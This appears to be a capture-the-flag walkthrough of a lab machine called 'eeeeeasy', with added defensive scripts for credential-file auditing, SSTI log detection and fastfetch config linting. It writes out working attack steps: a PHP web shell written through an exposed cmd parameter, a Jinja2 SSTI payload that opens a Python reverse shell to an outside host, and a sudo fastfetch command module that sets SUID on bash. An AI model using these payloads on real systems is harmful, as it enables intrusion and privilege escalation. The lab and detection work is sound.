2.eeeeeasy

1. Information Gathering

1.1. Port Scanning

┌──(root㉿kali)-[~/Desktop/hmv/eeeeeasy]
└─# nmap -sCV 192.168.56.106 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-17 02:12 EDT
Nmap scan report for 192.168.56.106
Host is up (0.00039s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp  open  http     Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.4.62 ((Debian))
| tls-alpn: 
|_  http/1.1
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.62 (Debian)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=PyCrt.PyCrt
| Subject Alternative Name: DNS:PyCrt.PyCrt
| Not valid before: 2025-04-01T14:05:29
|_Not valid after:  2035-03-30T14:05:29
MAC Address: 08:00:27:A0:E2:5A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.89 seconds

1.2. Directory Scanning

dirsearch found nothing with its default wordlist.
Switching wordlists turned up a /hacker path.

┌──(root㉿kali)-[~/Desktop/hmv/eeeeeasy]
└─# gobuster dir -u 192.168.56.106 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.106
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/hacker               (Status: 301) [Size: 317] [--> http://192.168.56.106/hacker/]
/server-status        (Status: 403) [Size: 279]
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================

1.3. JS Inspection

Visiting the directory shows a hacker-themed demo site, which is probably of no use by itself.
The key path showed up in a browser extension.
Let's try it:

┌──(root㉿kali)-[~/Desktop/hmv/eeeeeasy]
└─# curl https://192.168.56.106/hacker//supercoool.php?cmd=ls -k
<pre>css
dab.png
geek-hacker-typer.jpg
globe.gif
green-back.jpg
he6.jpg
img
index.html
js
lock-green.gif
lock-green.gif.ifl
map1.jpg
og.jpg
supercoool.php
</pre>

Writing a backdoor and popping a shell from here is enough.

https://192.168.56.106/hacker//supercoool.php?cmd=echo "<?php system(\$_POST['a']); ?>" > /var/www/html/2.php

The /hacker directory is not writable (no permission); writing into the html directory works.


2. Privilege Escalation

2.1. vim cache (.viminfo)

drwxr-xr-x 2 welcome welcome 4096 May 16 11:06 .
drwxr-xr-x 4 root    root    4096 May 16 07:05 ..
-rw------- 1 welcome welcome   13 May 16 11:06 .bash_history
-rw-r--r-- 1 welcome welcome  220 Apr 11 22:27 .bash_logout
-rw-r--r-- 1 welcome welcome 3526 Apr 11 22:27 .bashrc
-rw-r--r-- 1 welcome welcome  807 Apr 11 22:27 .profile
-rw-r--r-- 1 root    root      19 May 16 10:48 .viminfo
-rw-r--r-- 1 root    root      44 May 16 11:02 user.txt
(remote) www-data@eeeeeasy:/home/welcome$ cat .viminfo
welcome:welcome123

Switch to the welcome user.
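The password was recovered from a .viminfo file that another user could read, which is a configuration defect rather than a clever trick. The script below is an added example (not part of the original writeup) that audits a home directory for exactly that: history and editor state files readable by other users, and lines inside them that look like user:password pairs. The directory it scans is constructed in a temp dir to mirror the listing above; SENSITIVE_NAMES and CRED_RE are this example's own heuristics, not a standard list.

```python
"""Audit a home directory for files that commonly leak credentials.

Added example, not part of the original writeup. Checks for history/state
files readable by group or others, and for credential-shaped lines in them.
"""
import re
import stat
import tempfile
from pathlib import Path
from typing import Dict, List

# Files that retain command history, search strings or pasted text (assumed list).
SENSITIVE_NAMES = {
    ".viminfo", ".bash_history", ".zsh_history",
    ".mysql_history", ".python_history", ".lesshst",
}
# Loose "user:password" shape; flags candidates for a human to review.
CRED_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}:[^\s:]{4,}$")


def audit_home(home: Path) -> List[Dict[str, str]]:
    """Return one finding per problem found in the top level of `home`."""
    findings = []
    for entry in sorted(home.iterdir()):
        if not entry.is_file() or entry.name not in SENSITIVE_NAMES:
            continue
        mode = stat.S_IMODE(entry.stat().st_mode)
        if mode & (stat.S_IRGRP | stat.S_IROTH):
            findings.append({
                "path": str(entry),
                "issue": "history/state file readable by other users",
                "detail": f"mode {mode:04o}, expected 0600",
            })
        try:
            lines = entry.read_text(errors="replace").splitlines()
        except OSError:
            continue
        for lineno, line in enumerate(lines, 1):
            if CRED_RE.match(line.strip()):
                findings.append({
                    "path": str(entry),
                    "issue": "credential-like line",
                    "detail": f"line {lineno}",
                })
    return findings


def build_sample_home() -> Path:
    """Construct a throwaway home directory reproducing the box's mistake."""
    home = Path(tempfile.mkdtemp(prefix="welcome-"))
    (home / ".bash_history").write_text("ls -la\n")
    (home / ".bash_history").chmod(0o600)       # correct: private to the owner
    (home / ".viminfo").write_text("welcome:welcome123\n")  # constructed content
    (home / ".viminfo").chmod(0o644)            # the mistake: readable by www-data
    (home / ".profile").write_text("# ~/.profile\n")
    (home / ".profile").chmod(0o644)            # not a history file, not flagged
    return home


if __name__ == "__main__":
    for finding in audit_home(build_sample_home()):
        print(f"{finding['issue']}: {finding['path']} ({finding['detail']})")
```

Run against real home directories, the owner/permission check is the cheap part; the credential pattern is deliberately loose, so treat its hits as a review queue rather than proof.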

2.2. SSTI

welcome@eeeeeasy:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for welcome:           
Matching Defaults entries for welcome on eeeeeasy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on eeeeeasy:
    (qaq) PASSWD: /bin/cat /opt/flask-app/logs/flask.log
welcome@eeeeeasy:~$ sudo -u  qaq /bin/cat /opt/flask-app/logs/flask.log

 * Serving Flask app 'app'
 * Debug mode: on
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on http://127.0.0.1:5000
Press CTRL+C to quit
 * Restarting with stat
 * Debugger is active!
 * Debugger PIN: 135-249-609
welcome@eeeeeasy:~$ ss -tunlp
Netid          State           Recv-Q          Send-Q                   Local Address:Port                     Peer Address:Port          
udp            UNCONN          0               0                              0.0.0.0:68                            0.0.0.0:*             
tcp            LISTEN          0               128                            0.0.0.0:22                            0.0.0.0:*             
tcp            LISTEN          0               128                          127.0.0.1:5000                          0.0.0.0:*             
tcp            LISTEN          0               128                               [::]:22                               [::]:*             
tcp            LISTEN          0               128                                  *:443                                 *:*             
tcp            LISTEN          0               128                                  *:80                                  *:*       

As seen above, a Flask web app is listening on the loopback interface; forward the port out.

welcome@eeeeeasy:~$ socat TCP-LISTEN:1111,fork TCP:127.0.0.1:5000

SSTI is easy to confirm; go straight to a reverse shell.

{{ cycler.__init__.__globals__.os.popen('python3 -c "import socket,subprocess,os;s=socket.socket();s.connect((\'192.168.56.102\',1133));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\'/bin/sh\',\'-i\'])"').read() }}
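The payload above has a recognisable shape in any access log: a template expression in a query parameter, a dunder-attribute walk from a harmless Jinja2 global to the interpreter's globals, and a process-spawning call. The script below is an added example (not from the original writeup) that scans Werkzeug/Apache-style request lines for that shape, percent-decoding the target repeatedly because probes are often double-encoded. The log lines are constructed, and the indicator lists are this example's own heuristics.

```python
"""Flag Jinja2 SSTI probes in web-server access logs.

Added example, not from the original writeup. Parses the common prefix of
Werkzeug dev-server and Apache combined log lines, decodes the request
target, and inspects {{ ... }} / {% ... %} expressions for known indicators.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote_plus

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
TEMPLATE_EXPR = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)
INDICATORS = {
    # attribute walk from a harmless object towards the interpreter's globals
    "dunder_attr": re.compile(r"__(?:globals|builtins|class|subclasses|import|mro|init)__"),
    # names that end in a spawned process
    "os_exec": re.compile(r"\b(?:popen|system|subprocess|import\s+os)\b"),
    # Jinja2 globals commonly used as the starting object
    "jinja_global": re.compile(r"\b(?:cycler|joiner|namespace|lipsum|config|request|self)\b"),
}


def decode_target(target: str, rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (bounded to `rounds`)."""
    for _ in range(rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target


def classify(line: str) -> Optional[Dict[str, object]]:
    """Return a finding for a request carrying a template expression, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = decode_target(m.group("target"))
    exprs = TEMPLATE_EXPR.findall(target)
    if not exprs:
        return None
    hits = [name for name, rx in INDICATORS.items() if any(rx.search(e) for e in exprs)]
    severity = "high" if {"dunder_attr", "os_exec"} & set(hits) else "low"
    return {"ip": m.group("ip"), "target": target, "indicators": hits, "severity": severity}


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Classify every line and keep only the findings."""
    return [f for f in (classify(line) for line in lines) if f is not None]


# Constructed Werkzeug dev-server log lines (the app on this box listens on :5000).
SAMPLE_LOG = [
    '127.0.0.1 - - [17/May/2025 15:53:02] "GET /?name=alice HTTP/1.1" 200 -',
    '127.0.0.1 - - [17/May/2025 15:53:40] "GET /?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 -',
    '127.0.0.1 - - [17/May/2025 15:54:20] "GET /?name=%7B%7B%20cycler.__init__.__globals__'
    '.os.popen%28%27id%27%29.read%28%29%20%7D%7D HTTP/1.1" 200 -',
    '127.0.0.1 - - [17/May/2025 15:54:41] "GET /?name=%257B%257Bconfig.items%2528%2529%257D%257D HTTP/1.1" 200 -',
    '127.0.0.1 - - [17/May/2025 15:55:10] "POST /login HTTP/1.1" 302 -',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['ip']} {f['indicators']} {f['target']}")
```

The `{{7*7}}` probe only rates "low" because it carries no escape indicators, but it is the usual first request in a sequence and worth correlating with what the same client sends next. Note that POST bodies are not in the access log at all, so this catches only query-string delivery; the real fix is never rendering user input as a template.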


2.3. sudo abuse: fastfetch

(remote) qaq@eeeeeasy:/home$ sudo -l
Matching Defaults entries for qaq on eeeeeasy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User qaq may run the following commands on eeeeeasy:
    (ALL) NOPASSWD: /usr/bin/fastfetch

The --file option gives arbitrary file read.


Command execution is also possible by modifying the configuration:
github.com/fastfetch-cli/fastfetch
Write a modules config modelled on the project's examples:

{
    "modules": [
        {
            "type": "command",
            "text": "chmod +s /bin/bash",
            "key": "Editor"
        }
    ]
}

Then create your own config file:

# First generate a default one
(remote) qaq@eeeeeasy:/home$ fastfetch --gen-config
The generated config file has been written in `/home/qaq/fastfetch/config.jsonc`

# Edit the modules
(remote) qaq@eeeeeasy:/home$ cat /home/qaq/fastfetch/config.jsonc
{
  "$schema": "https://github.com/fastfetch-cli/fastfetch/raw/dev/doc/json_schema.json",
  "modules": [
    "title",
    "separator",
    "os",
    "host",
    "kernel",
    "uptime",
    "packages",
    "shell",
    "display",
    "de",
    "wm",
    "wmtheme",
    "theme",
    "icons",
    "font",
    "cursor",
    "terminal",
    "terminalfont",
    "cpu",
    "gpu",
    "memory",
    "swap",
    "disk",
    "localip",
    "battery",
    "poweradapter",
    "locale",
    "break",
    "colors",  

    {
      "type": "command",
      "text": "chmod +s /bin/bash",
      "key": "Editor"
    }
  ]
}

# Then run it: the module is loaded and the command executes
sudo fastfetch --config /home/qaq/fastfetch/config.jsonc
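The lesson of this section is that a rule like "(ALL) NOPASSWD: /usr/bin/fastfetch" is a root shell, because the caller picks the config with --config and a "command" module runs whatever "text" says as the invoking user. Anyone who wants to lint such configs before trusting them hits a practical snag first: the file is JSONC, and json.loads rejects the // and /* */ comments and trailing commas the format allows. The script below is an added example (not from the original writeup, and not fastfetch's own code) that strips those with a string-aware scanner and then reports every command-type module. COMMAND_MODULE_TYPES holds only the module type shown on this page and is an assumption to extend from the project's schema; the sample config is constructed to match the writeup's config.jsonc.

```python
"""Audit a fastfetch JSONC config for modules that run shell commands.

Added example, not part of the original writeup and not fastfetch's own code.
"""
import json
from typing import Any, Dict, List

# Module types that spawn a process (assumption: only the type seen on the page).
COMMAND_MODULE_TYPES = {"command"}


def _skip_string(text: str, i: int) -> int:
    """Given text[i] == '"', return the index just past the closing quote."""
    i += 1
    while i < len(text):
        if text[i] == "\\":
            i += 2                      # escaped character, copy verbatim
        elif text[i] == '"':
            return i + 1
        else:
            i += 1
    return i


def _drop_comments(text: str) -> str:
    """Remove // and /* */ comments, leaving string contents untouched."""
    out: List[str] = []
    i, n = 0, len(text)
    while i < n:
        if text[i] == '"':
            j = _skip_string(text, i)
            out.append(text[i:j])
            i = j
        elif text.startswith("//", i):  # line comment: skip to the newline
            j = text.find("\n", i)
            i = n if j == -1 else j
        elif text.startswith("/*", i):  # block comment: skip past */
            j = text.find("*/", i + 2)
            i = n if j == -1 else j + 2
        else:
            out.append(text[i])
            i += 1
    return "".join(out)


def _drop_trailing_commas(text: str) -> str:
    """Remove a comma whose next non-blank character is } or ]."""
    out: List[str] = []
    i, n = 0, len(text)
    while i < n:
        if text[i] == '"':
            j = _skip_string(text, i)
            out.append(text[i:j])
            i = j
        elif text[i] == ",":
            j = i + 1
            while j < n and text[j].isspace():
                j += 1
            if not (j < n and text[j] in "}]"):
                out.append(",")
            i += 1
        else:
            out.append(text[i])
            i += 1
    return "".join(out)


def parse_jsonc(text: str) -> Any:
    """Parse JSONC by normalising it to strict JSON first."""
    return json.loads(_drop_trailing_commas(_drop_comments(text)))


def find_command_modules(config_text: str) -> List[Dict[str, Any]]:
    """List modules whose type spawns a process; these run as whoever runs fastfetch."""
    cfg = parse_jsonc(config_text)
    findings = []
    for idx, mod in enumerate(cfg.get("modules", [])):
        if isinstance(mod, dict) and mod.get("type") in COMMAND_MODULE_TYPES:
            findings.append({"index": idx, "key": mod.get("key"), "text": mod.get("text")})
    return findings


# Constructed to mirror the writeup's config.jsonc, plus the comments and
# trailing comma that the JSONC format permits.
SAMPLE_CONFIG = '''{
  "$schema": "https://github.com/fastfetch-cli/fastfetch/raw/dev/doc/json_schema.json",
  "modules": [
    "title", "os", "kernel", /* the built-in modules only print facts */
    {
      "type": "command",            // runs "text" through a shell
      "text": "chmod +s /bin/bash",
      "key": "Editor"
    }, // trailing comma
  ]
}'''

if __name__ == "__main__":
    for f in find_command_modules(SAMPLE_CONFIG):
        print(f"module[{f['index']}] key={f['key']!r} runs: {f['text']}")
```

Linting the config only helps where the config is fixed by the administrator; when the sudo rule lets the caller supply the path, the check has to happen in sudoers itself (not granting the binary, or not granting it without a password), since any file the user can write can be passed in.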
